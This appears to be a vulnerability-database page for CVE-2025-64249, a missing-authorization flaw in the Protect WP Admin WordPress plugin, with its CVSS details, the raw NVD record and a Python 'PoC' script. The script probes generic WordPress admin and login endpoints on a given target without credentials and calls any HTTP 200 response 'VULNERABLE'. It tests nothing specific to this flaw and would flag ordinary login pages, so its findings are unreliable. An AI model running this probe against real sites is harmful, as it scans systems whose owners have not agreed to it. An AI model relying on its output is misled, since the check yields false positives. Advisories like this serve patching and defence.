Security Vulnerability Report
中文
CVE-2025-64249 CVSS 5.3 MEDIUM

CVE-2025-64249

Published: 2025-12-16 09:15:55
Last Modified: 2026-04-27 16:16:38

Description

Missing Authorization vulnerability in WP-EXPERTS.IN Protect WP Admin protect-wp-admin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Protect WP Admin: from n/a through <= 4.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Protect WP Admin plugin <= 4.1 (所有版本)
WordPress (受保护的目标系统)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64249 PoC - Protect WP Admin Broken Access Control # This PoC demonstrates the missing authorization vulnerability in Protect WP Admin plugin import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-64249 Missing Authorization in Protect WP Admin plugin """ # Target WordPress site with Protect WP Admin plugin target = target_url.rstrip('/') # Common Protect WP Admin protected endpoints endpoints = [ '/wp-admin/admin-ajax.php', '/wp-admin/admin.php', '/wp-login.php', '/wp-admin/options-general.php' ] print(f"[*] Testing target: {target}") print(f"[*] CVE-2025-64249: Missing Authorization in Protect WP Admin") print("-" * 60) for endpoint in endpoints: url = target + endpoint try: response = requests.get(url, timeout=10, allow_redirects=False) print(f"\n[>] Testing endpoint: {endpoint}") print(f" Status Code: {response.status_code}") print(f" Content-Length: {len(response.content)}") # Check if access is granted without proper authorization if response.status_code == 200: print(f" [!] VULNERABLE: Access granted without authorization check") elif response.status_code in [301, 302, 307, 308]: print(f" [~] Redirect detected: {response.headers.get('Location', 'N/A')}") else: print(f" [+] Protected: Access denied (Status {response.status_code})") except requests.RequestException as e: print(f" [!] Error accessing {endpoint}: {str(e)}") print("\n[*] Note: This PoC is for educational and authorized testing purposes only.") print("[*] Always obtain proper authorization before testing any target.") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-64249-poc.py <target_url>") print("Example: python cve-2025-64249-poc.py http://example.com") sys.exit(1) target_url = sys.argv[1] check_vulnerability(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64249", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:54.683", "lastModified": "2026-04-27T16:16:37.573", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WP-EXPERTS.IN Protect WP Admin protect-wp-admin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Protect WP Admin: from n/a through <= 4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/protect-wp-admin/vulnerability/wordpress-protect-wp-admin-plugin-4-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}